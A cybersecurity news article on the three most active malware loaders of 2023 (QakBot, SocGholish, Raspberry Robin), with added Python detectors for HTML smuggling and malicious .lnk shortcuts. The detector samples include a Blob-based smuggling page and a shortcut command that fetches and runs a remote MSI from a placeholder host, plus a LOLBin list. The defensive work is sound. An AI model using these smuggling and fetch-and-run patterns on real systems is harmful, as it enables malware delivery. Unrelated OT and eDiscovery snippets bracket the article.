What works in IT may not work in an operational technology (OT) or industrial control systems (ICS) environment, where the availability and safety of operations must be maintained.
Top 3 Malware Loaders of 2023 That Fueled 80% of Cyber Attacks
Malware loaders are a challenge for SOC teams because different loaders, even ones delivering the same final malware, need distinct mitigations.
They are also the key element of initial network access and payload delivery, and the payloads most often pushed through them are remote-access software and post-exploitation tools.
Detecting a loader does not always mean the network has been compromised; the kill chain is sometimes stopped early, before the second-stage payload runs.
Cybersecurity analysts at ReliaQuest have examined the loaders that were most active in 2023 and found that the top three accounted for 80% of the attacks they observed.
Unveiled Malware Loaders
The loaders identified by ReliaQuest's researchers include, among others:-
SocGholish
Gootloader
Among them, the top 3 malware loaders observed to be the most active were:-
QBot (aka QakBot, QuackBot, Pinkslipbot)
SocGholish (aka FakeUpdates)
Raspberry Robin
Most observed malware loaders (Source: ReliaQuest)
Technical Analysis of Top 3 Malware Loaders
Here below is the technical analysis of each of the top 3 malware loaders:-
QakBot
QakBot started as a banking trojan and quickly grew into a multi-purpose loader. Beyond gaining initial network access, it:-
Drops additional payloads
Steals data
Aids lateral movement
Enables remote execution
QakBot is linked to the “Black Basta” ransomware gang; once inside a network it performs discovery, communicates with its C2 infrastructure, relays the information it collects, and drops post-exploitation payloads.
When Microsoft began blocking macros in documents carrying the Mark of the Web (MOTW), QakBot swiftly adapted with HTML smuggling and by switching payload file types; a February 2023 campaign against US entities delivered it through OneNote files.
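HTML smuggling, as an added example that is not code from the article or from ReliaQuest: the lure page carries the payload as a base64 string and uses a handful of JavaScript calls (atob, Blob, createObjectURL, a synthetic click on a link with a download attribute) to reassemble it into a file inside the browser, so nothing that looks like an executable or archive crosses the network for a gateway scanner to inspect. The heuristic below scores an HTML document on those assembly steps, extracts the largest base64 run, and names the embedded file from its magic bytes. The sample pages, the ZIP-like payload (magic bytes plus padding, not a real archive) and the scoring threshold are constructed for this example.

```python
import base64
import re

# Script-side building blocks an HTML smuggling page needs: decode an embedded
# string, wrap it as a file in memory, and push it through the browser's download path.
SMUGGLING_MARKERS = [
    (r"\batob\s*\(", "base64 decode in JavaScript"),
    (r"new\s+Blob\s*\(", "file object assembled in memory"),
    (r"createObjectURL\s*\(", "in-memory file exposed as a downloadable URL"),
    (r"msSaveOrOpenBlob", "legacy IE/Edge download API"),
    (r"\.download\s*=", "download attribute set on a dynamically created link"),
    (r"\.click\s*\(\s*\)", "download triggered without a user gesture"),
]

# File signatures of containers that loaders have been delivered in.
MAGIC = {
    b"PK\x03\x04": "ZIP archive",
    b"MZ": "Windows PE executable",
    b"Rar!\x1a\x07": "RAR archive",
}

# A payload worth smuggling is large; 64+ base64 characters in one run is the floor used here.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def largest_base64_blob(html):
    blobs = BASE64_RE.findall(html)
    return max(blobs, key=len) if blobs else None


def identify_payload(blob):
    """Decode a base64 run and name it from its magic bytes; None if it is not valid base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    for magic, name in MAGIC.items():
        if raw.startswith(magic):
            return name
    return "unknown binary"


def score_html(html):
    """Return the markers hit, the largest embedded blob, and a verdict for one HTML document."""
    hits = [desc for pattern, desc in SMUGGLING_MARKERS if re.search(pattern, html)]
    blob = largest_base64_blob(html)
    payload = identify_payload(blob) if blob else None
    # Three or more assembly steps plus an embedded blob is the smuggling shape;
    # a lone atob() or a single large base64 image is common on legitimate pages.
    verdict = "smuggling" if len(hits) >= 3 and blob else "clean"
    return {"markers": hits, "blob_chars": len(blob) if blob else 0, "payload": payload, "verdict": verdict}


# Constructed samples: a ZIP-like payload dropped through the canonical
# Blob/createObjectURL pattern, and a benign page with an ordinary download link.
PAYLOAD_B64 = base64.b64encode(b"PK\x03\x04" + b"\x00" * 60).decode()
SMUGGLED_HTML = f"""<html><body><p>Loading your document...</p>
<script>
var b64 = "{PAYLOAD_B64}";
var bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0));
var blob = new Blob([bytes], {{type: "application/octet-stream"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.zip";
a.click();
</script></body></html>"""
CLEAN_HTML = '<html><body><a href="/files/report.pdf">Download report</a><script>console.log("ok")</script></body></html>'

if __name__ == "__main__":
    for name, doc in (("smuggled", SMUGGLED_HTML), ("clean", CLEAN_HTML)):
        print(name, score_html(doc))
```

One caveat for anyone tuning this: the browser still stamps the file it saves with the Mark of the Web, so smuggling alone does not defeat MOTW. The campaigns in question paired it with container formats (ISO and IMG images at the time) whose contents did not inherit the mark, which is why the payload type inside the blob matters as much as the smuggling shape itself.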
SocGholish
SocGholish is a notorious JavaScript-based loader that primarily targets Windows users and organisations. It spreads through drive-by downloads on compromised websites, luring visitors with fake Microsoft Teams and Adobe Flash update prompts.
SocGholish is tied to the Russia-based group “Evil Corp,” which targets US industries like:-
Accommodation
Retail
Law
It is also connected to “Exotic Lily,” an initial access broker that sells access gained through phishing to other threat actors, including ransomware groups.
In 2022 the loader spread through compromised websites and social engineering; a few clicks by a single user can expose an entire domain or network, and in 2023 it was behind several aggressive watering hole campaigns.
Raspberry Robin
Raspberry Robin is a highly elusive worm-turned-loader that targets Windows users and organisations. It spreads through infected USB devices: a malicious LNK (shortcut) file on the drive launches native Windows processes, which download and run its DLL.
It also uses several techniques to persist and evade detection, including scheduled tasks and code injection.
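The USB-borne shortcut described above, as an added example that is not code from the article or from ReliaQuest: a Windows .lnk file has a fixed 76-byte header followed by optional structures and a sequence of length-prefixed strings (relative path, working directory, command-line arguments), so the traits a triage script wants are cheap to pull out without executing anything. The Python below builds a minimal shortcut in memory, parses it back following the MS-SHLLINK layout, and flags the loader pattern: a native LOLBin as the target, a second LOLBin and a remote URL in the arguments, and a window state that keeps the console off-screen. The sample shortcut (cmd.exe handing off to msiexec to fetch a remote package) and the LOLBin list are constructed for this example.

```python
import re
import struct

# Shell Link (.lnk) header constants from the MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # window minimised and not activated, so the user sees nothing

# Native binaries a desktop shortcut rarely needs to launch (names without ".exe").
LOLBINS = ("cmd", "msiexec", "rundll32", "regsvr32", "odbcconf", "mshta", "wscript", "cscript", "powershell")
LOLBIN_RE = re.compile(r"\b(" + "|".join(LOLBINS) + r")(?:\.exe)?\b", re.IGNORECASE)
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def _string_data(s):
    # StringData item: CountCharacters (uint16) followed by UTF-16LE characters.
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path, working_dir, arguments, show_command=SW_SHOWMINNOACTIVE):
    """Assemble a minimal .lnk with no IDList or LinkInfo, only the string fields needed here."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, three FILETIMEs, FileSize,
    # IconIndex, ShowCommand, HotKey, Reserved1, Reserved2, Reserved3.
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + _string_data(relative_path) + _string_data(working_dir) + _string_data(arguments)


def parse_lnk(data):
    """Validate the header, skip the optional structures, and return the StringData fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize + IDList bytes
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize counts itself
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_command}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        size = count * 2 if unicode else count
        raw = data[pos:pos + size]
        pos += size
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return fields


def triage_lnk(data):
    """Flag the traits of a USB loader shortcut: LOLBin target, LOLBin/URL in arguments, hidden window."""
    info = parse_lnk(data)
    target = info.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    target_base = target[:-4] if target.endswith(".exe") else target
    args = info.get("arguments", "")
    lolbins = sorted({m.lower() for m in LOLBIN_RE.findall(args)})
    url = URL_RE.search(args)
    result = {
        "target": target,
        "target_is_lolbin": target_base in LOLBINS,
        "lolbins_in_arguments": lolbins,
        "remote_url": url.group(0) if url else None,
        "window_hidden": info["show_command"] == SW_SHOWMINNOACTIVE,
    }
    result["suspicious"] = result["target_is_lolbin"] and (bool(lolbins) or url is not None)
    return result


# Constructed sample in the shape described for Raspberry Robin: cmd.exe on the
# removable drive hands off to msiexec, which fetches the loader from a remote host.
SAMPLE_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\cmd.exe",
    working_dir="C:\\Windows\\System32",
    arguments="/c msiexec /q /i http://example.invalid/p.msi",
)

if __name__ == "__main__":
    for key, value in triage_lnk(SAMPLE_LNK).items():
        print(f"{key}: {value}")
```

The parser deliberately stops after the string fields; the ExtraData blocks that follow (tracker, console and environment blocks) carry the machine ID and NetBIOS name of the host that built the shortcut and are worth pulling out separately for attribution, but they are not needed for the go/no-go decision shown here.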
Raspberry Robin is linked to several threat groups, including Evil Corp and Silence (aka Whisper Spider).
Threat actors use Raspberry Robin to deliver Cobalt Strike as well as several ransomware families and other malware, including:-
Clop
Raspberry Robin was also linked to SocGholish operations against legal and financial services organizations in Q1 2023, a sign of collaboration between crime syndicates.
The post Top 3 Malware Loaders of 2023 That Fueled 80% of Cyber Attacks appeared first on Cyber Security News.
Cyber Security News
How eDiscovery Can Help You Reduce Data and Risks in Three Steps
As data volumes continue to balloon, it’s becoming clear that the quickest path to victory does not involve the fewest steps. This month’s episode of Uncovering Hidden Risks explores ways to defensibly move data minimization decisions upstream to collaboratively expedite the eDiscovery process. EJ Bastien, Director of Discovery Programs at Microsoft, joins Erica Toelle and guest host Caitlin Fitzgerald for the discussion. EJ leads the eDiscovery and Litigation Support team at Microsoft. EJ shares his experience using technology to address the challenges of eDiscovery in the modern cloud world and shares some strategies and best practices to help mitigate risk.
The CyberWire